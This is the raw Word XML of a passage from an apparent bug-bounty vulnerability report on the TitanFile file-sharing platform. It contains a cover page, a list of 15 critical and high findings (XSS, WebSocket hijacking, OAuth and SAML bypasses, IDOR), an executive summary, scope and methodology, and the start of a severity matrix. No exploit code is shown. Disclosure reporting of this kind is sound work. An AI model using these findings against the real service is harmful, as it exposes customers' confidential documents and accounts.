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56"/>
        </w:rPr>
        <w:t>VULNERABILITY ASSESSMENT REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="444444"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>TitanFile Secure File Sharing Platform</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0066CC"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>https://app.titanfile.com</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Document Classification: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Confidential</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Assessment Date: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>June 10-11, 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Report Version: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Researcher: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>rjfs8320@gmail.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Bug Bounty Program: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Open Bug Bounty — Titanfile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Total Findings: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>15 (3 Critical, 12 High)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2. Scope and Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3. Risk Summary Matrix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>4. Detailed Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="850"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    VULN-001: DOM XSS in File Previewer → Account Takeover Chain [CRITICAL]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="850"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    VULN-002: CSWSH + Socket Permission Injection → Privilege Escalation [CRITICAL]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="850"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    VULN-003: OAuth2 Dynamic redirect_uri via Wildcard DNS [CRITICAL]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="850"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    VULN-004: WOPI File Access Token IDOR → Cross-Tenant Doc Access [HIGH]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="850"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    VULN-005: CSP unsafe-inline + unsafe-eval on Authenticated Pages [HIGH]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="850"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    VULN-006: CSP form-action Wildcard → Form Data Exfiltration [HIGH]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="850"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    VULN-007: SAML Auth Bypass via Unsigned Requests + Wildcard DNS [HIGH]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="850"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    VULN-008: Client-Side Permission Model → Privilege Escalation [HIGH]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="850"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    VULN-009: Missing Authorization on Impersonation Interface [HIGH]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="850"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    VULN-010: Unescaped Error Messages → Reflected DOM XSS [HIGH]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="850"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    VULN-011: Full Client-Side Source Code Exposed (46 Files) [HIGH]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="850"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    VULN-012: SAML SP Metadata Disclosure on Any Subdomain [HIGH]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="850"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    VULN-013: Stored XSS via Unsanitized File Preview (Standalone) [HIGH]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="850"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    VULN-014: Socket Events Blindly Overwrite Permissions (Standalone) [HIGH]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="850"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    VULN-015: form-action * + HTML Injection → CSRF Token Theft Chain [HIGH]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>5. Vulnerability Chains</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>6. Technology Stack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>7. Appendices</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>A comprehensive security assessment of the TitanFile secure file sharing platform at app.titanfile.com was conducted through passive reconnaissance, HTTP header analysis, and deep client-side source code audit of all 46 publicly exposed JavaScript/TypeScript source files.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The assessment identified 15 Critical and High severity vulnerabilities that, when chained together, enable full account takeover, cross-tenant document access, administrative privilege escalation, and SAML authentication bypass. The most severe attack chain combines a DOM-based XSS sink in the file previewer component with the application's permissive Content Security Policy and dynamic OAuth2 redirect URI handling to achieve complete account compromise through OAuth authorization code interception.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Overall Risk Rating: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CRITICAL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The root causes center on five systemic issues:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Client-side-only security enforcement — Permission checks, BCC privacy controls, and feature gates exist only in JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Overly permissive Content Security Policy — unsafe-inline and unsafe-eval on authenticated pages completely negate XSS protection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Wildcard DNS without subdomain validation — *.titanfile.com resolves to the same server, enabling OAuth redirect manipulation and SAML ACS spoofing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Unsanitized data rendering — Multiple DOM XSS sinks where server or user-controlled data is inserted into the page without escaping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Unauthenticated WebSocket access — Socket.IO endpoints accept connections and issue session IDs without authentication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>These vulnerabilities pose severe risk to TitanFile's enterprise customers — including law firms (Foley &amp; Lardner, Gowling WLG), financial institutions (RBC Bank), and government agencies (NS Utility and Review Board) — who rely on the platform for confidential document exchange.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>2. Scope and Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 Scope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val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Asset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>In Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>app.titanfile.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Primary application</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>*.titanfile.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Wildcard DNS resolves to same infrastructure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>app.titanfile.qa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Observed only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>QA environment (no active testing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Client-side JS source code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>46 publicly accessible unbundled files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 Out of Scope (per VDP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Denial of Service attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Social engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Accessing other users' data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Exploiting live user data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.3 Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The assessment followed OWASP Testing Guide v4.2 and PTES methodologies:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Passive Reconnaissance — DNS enumeration, subdomain discovery, technology fingerprinting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP Header Analysis — CSP, HSTS, cookie attributes, security headers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Authentication Flow Analysis — OAuth2, SAML 2.0, session management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Client-Side Source Code Audit — Complete security review of all 46 exposed JS/TS files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability Chaining — Combining individual findings into multi-step exploit chains</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Reverification — Live validation of all findings against production on June 11, 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>3. Risk Summary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fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4608"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>VULN-001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4608"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>DOM XSS → OAuth Code Theft → Account Takeover Chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>9.3</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VULN-002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4608"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CSWSH + Socket Permission Injection → Admin Priv Esc Chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>9.1</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VULN-003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4608"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Google OAuth2 Dynamic redirect_uri via Wildcard DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>8.2</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VULN-004</w:t>
            </w:r>
          </w:p>
        </w:tc>
